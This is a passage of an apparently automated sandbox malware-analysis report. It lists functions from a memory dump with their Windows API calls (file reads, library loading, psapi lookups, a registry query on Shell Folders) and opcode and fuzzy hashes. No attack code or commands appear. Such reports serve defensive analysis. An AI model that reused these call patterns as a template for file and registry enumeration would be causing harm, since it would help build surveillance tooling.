                    • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                    • String ID:
                    • API String ID: 1481295809-0
                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                    • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$PointerRead
                    • String ID:
                    • API String ID: 3154509469-0
                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itowmemset
                    • String ID:
                    • API String ID: 4232544981-0
                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FileModuleName
                    • String ID:
                    • API String ID: 3859505661-0
                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                    Download Yara Rule
                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                    Download Yara Rule
                    APIs
                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                    Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                    Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    • API String ID: 3334572018-0
                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                    Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                    Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                    • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004095FC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                    • String ID:
                    • API String ID: 3655998216-0
                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00445426
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                    • String ID:
                    • API String ID: 1828521557-0
                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                    Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                    • memcpy.MSVCRT ref: 00406942
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@FilePointermemcpy
                    • String ID:
                    • API String ID: 609303285-0
                    • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                    • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
